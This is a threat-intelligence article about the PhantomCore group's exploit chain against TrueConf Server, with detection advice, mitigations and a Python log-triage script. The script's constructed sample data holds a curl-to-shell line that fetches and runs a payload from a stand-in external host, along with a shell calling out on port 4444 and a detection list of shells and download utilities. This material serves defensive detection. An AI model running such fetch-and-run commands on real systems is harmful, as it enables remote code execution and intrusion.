root@rebel:~$ cd /news/threats/trueconf-server-rce-phantomcore-exploit-chain-patch-now_
[TIMESTAMP: 2026-04-27 12:45 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: CRITICAL]

TrueConf Server RCE: PhantomCore Exploit Chain — Patch Now

CRITICAL Threat Intel #PhantomCore #TrueConf #RCE
AI-Assisted Analysis
READ_TIME: 4 min read
// executive briefing tl;dr
  • [01] Immediate impact: The pro-Ukrainian hacktivist group PhantomCore executes arbitrary commands on exposed TrueConf servers, gaining full control of the host and a foothold in the victim's internal network.
  • [02] Affected systems: TrueConf Server installations running releases vulnerable to the three-vulnerability exploit chain observed in the campaign.
  • [03] Remediation: Update TrueConf Server to the latest patched release and restrict the web management interface to trusted network segments.

Overview of PhantomCore Campaigns

A pro-Ukrainian hacktivist group tracked as PhantomCore has been observed targeting Russian organizations by exploiting critical vulnerabilities in communication infrastructure. Active since at least September 2025, the group has focused on servers running TrueConf video conferencing software, a popular regional alternative to Western platforms. According to The Hacker News, research from Positive Technologies indicates that the attackers chain several vulnerabilities to gain unauthorized access to corporate networks.

The campaign highlights a shift in the hacktivist landscape: groups are moving beyond simple DDoS attacks toward complex operations involving RCE and deep network penetration. By targeting domestic software, PhantomCore capitalizes on the concentrated attack surface created by the regional transition to localized software stacks, where a single product vulnerability exposes many organizations at once.

Analyzing the TrueConf video conferencing software RCE exploit

The core of the PhantomCore campaign is an exploit chain comprising three distinct vulnerabilities. Specific CVE identifiers were not assigned in the initial reporting, but the chain works by bypassing authentication and then abusing improper input validation to achieve remote code execution. The result is that an unauthenticated attacker can execute arbitrary commands with the privileges of the TrueConf service account.

The available analysis suggests that the first stage targets the web-based management interface. By chaining a path traversal or logic flaw with a secondary vulnerability in the internal API, the attackers can upload a malicious payload; the final step triggers execution of that payload through the server's backend processing engine. Because every stage is reached through the same exposed web interface, a perimeter firewall that permits access to that interface does nothing to break the chain; only patching, or removing the interface from untrusted reach, does.

PhantomCore Hacktivist Group TTPs and Post-Exploitation

Once initial access is established, PhantomCore's TTPs shift toward persistence and reconnaissance. The group typically deploys custom C2 frameworks designed to blend in with legitimate TrueConf traffic, which makes detection difficult for standard EDR tooling that is not tuned to the server's video conferencing protocols.

Evidence suggests that PhantomCore prioritizes exfiltration of sensitive meeting data, contact lists, and internal documents. The group has also been observed attempting lateral movement within the compromised environment: by harvesting credentials from memory or exploiting further internal vulnerabilities, they pivot from the perimeter video conferencing server to domain controllers and file servers. This playbook maps onto the same MITRE ATT&CK tactics (credential access, lateral movement, collection, exfiltration) seen in state-aligned intrusions, despite the group's hacktivist branding.

How to Detect TrueConf Server Compromise

Security teams should monitor TrueConf hosts for the following indicator categories, in priority order:

  • Log Anomalies: Examine TrueConf Server web logs for unusual POST requests to administrative endpoints, especially uploads, originating from IP addresses outside the networks your administrators actually use.
  • Process Monitoring: Alert on unexpected child processes spawned by the TrueConf service executable, such as cmd.exe, powershell.exe, sh/bash, or download utilities like curl or certutil.
  • Network Traffic: Look for outbound connections from the server, or from processes it spawned, to IP addresses that are neither internal nor on the host's known egress allowlist; these may indicate a C2 channel.
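The three checks above, as an added example that is not part of the original article or any TrueConf or Positive Technologies tooling. Everything environment-specific is a hypothetical assumption and should be replaced with real values: the web-manager path (/admin), the service binary names (tc_server, TrueConfServer.exe), the management subnet (10.20.0.0/24), and the vendor egress host. All sample log lines, process events, and connection records are constructed.

```python
"""Triage helpers for the three IoC categories listed above.

Added example for this page; not TrueConf's or Positive Technologies' tooling.
Assumptions (all hypothetical): web-manager requests live under /admin, the
TrueConf service binaries are tc_server / TrueConfServer.exe, the management
subnet is 10.20.0.0/24, and every sample event below is constructed.
"""
import ipaddress
import re

ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/24")]      # hypothetical management subnet
INTERNAL_NETS = [ipaddress.ip_network(n) for n in         # RFC 1918 + loopback count as "internal"
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
ADMIN_PATH_PREFIX = "/admin"                              # assumed web-manager path
SERVICE_PROCS = {"tc_server", "trueconfserver.exe"}       # hypothetical service binary names
SHELLS_AND_LOLBINS = {"sh", "bash", "dash", "cmd.exe", "powershell.exe",
                      "curl", "wget", "certutil.exe", "python3"}
KNOWN_EGRESS = {"203.0.113.10"}                           # e.g. vendor update host (hypothetical)

# Combined/CLF-style access log line: client ip, timestamp, request line, status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})')


def _basename(path):
    """Last path component, Windows or POSIX, lower-cased for set lookups."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _in_any(ip, nets):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def scan_web_log(lines):
    """Flag POSTs to the web-manager path from outside the management subnet."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # unparseable line: skip, don't abort the sweep
        if (m["method"] == "POST" and m["path"].startswith(ADMIN_PATH_PREFIX)
                and not _in_any(m["ip"], ADMIN_NETS)):
            hits.append((m["ip"], m["ts"], m["path"], m["status"]))
    return hits


def scan_process_events(events):
    """events: (parent_image, child_image, cmdline). Flag shells/LOLBins under the service."""
    return [(_basename(p), _basename(c), cmd) for p, c, cmd in events
            if _basename(p) in SERVICE_PROCS and _basename(c) in SHELLS_AND_LOLBINS]


def scan_connections(conns):
    """conns: (process, dst_ip, dst_port). Flag outbound to external, non-allowlisted hosts
    from the service itself or from a shell/LOLBin (a likely C2 channel)."""
    watched = SERVICE_PROCS | SHELLS_AND_LOLBINS
    return [(proc, dst, port) for proc, dst, port in conns
            if _basename(proc) in watched and dst not in KNOWN_EGRESS
            and not _in_any(dst, INTERNAL_NETS)]


# --- constructed sample telemetry (not real logs; paths are hypothetical) ---
SAMPLE_WEB_LOG = [
    '10.20.0.15 - - [27/Apr/2026:09:12:01 +0000] "POST /admin/settings HTTP/1.1" 200 512',
    '198.51.100.23 - - [27/Apr/2026:09:14:40 +0000] "GET /admin/login HTTP/1.1" 200 2048',
    '198.51.100.23 - - [27/Apr/2026:09:14:44 +0000] "POST /admin/upload HTTP/1.1" 200 1337',
    '192.0.2.77 - - [27/Apr/2026:09:15:02 +0000] "POST /api/v1/conferences HTTP/1.1" 403 0',
    'garbage line that does not parse',
]
SAMPLE_PROCESS_EVENTS = [
    ("/opt/trueconf/bin/tc_server", "/bin/sh", "sh -c 'curl -s http://198.51.100.23/x | sh'"),
    ("C:\\Program Files\\TrueConf Server\\TrueConfServer.exe",
     "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c whoami"),
    ("/usr/sbin/cron", "/usr/sbin/logrotate", "logrotate /etc/logrotate.conf"),
    ("/opt/trueconf/bin/tc_server", "/opt/trueconf/bin/tc_media", "tc_media --worker"),
]
SAMPLE_CONNECTIONS = [
    ("tc_server", "10.20.0.5", 443),        # internal: fine
    ("tc_server", "203.0.113.10", 443),     # allowlisted egress: fine
    ("sh", "198.51.100.23", 4444),          # shell calling out: flag
    ("tc_server", "203.0.113.99", 8080),    # service to unknown external host: flag
]

if __name__ == "__main__":
    for name, hits in (("web log", scan_web_log(SAMPLE_WEB_LOG)),
                       ("process", scan_process_events(SAMPLE_PROCESS_EVENTS)),
                       ("network", scan_connections(SAMPLE_CONNECTIONS))):
        for hit in hits:
            print(f"[{name}] {hit}")
```

On the constructed data the sweep flags one admin-endpoint POST from an external address, two shell children of the service binary, and two external connections. Internal ranges are enumerated explicitly rather than via ipaddress.is_private, which would also treat the documentation ranges used in the samples (198.51.100.0/24, 203.0.113.0/24) as non-public; feed it your own egress allowlist and management subnet before trusting the output.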

Mitigation and Recommendations

To defend against this threat, organizations should treat their communication infrastructure under Zero Trust assumptions. The following actions are recommended:

  1. Immediate Patching: Update all TrueConf Server instances to the most recent version provided by the vendor. This is the only definitive way to break the exploit chain.
  2. Network Segmentation: Place video conferencing servers in a dedicated DMZ and restrict their ability to initiate connections into the internal network, and to the internet beyond the vendor's update hosts, so that a compromised server cannot easily pivot or reach a C2 server.
  3. Access Control: Expose the management interface only over a VPN or to specific, authorized management workstations. Enforce multi-factor authentication for all administrative accounts so that a harvested password alone does not grant administrative access.
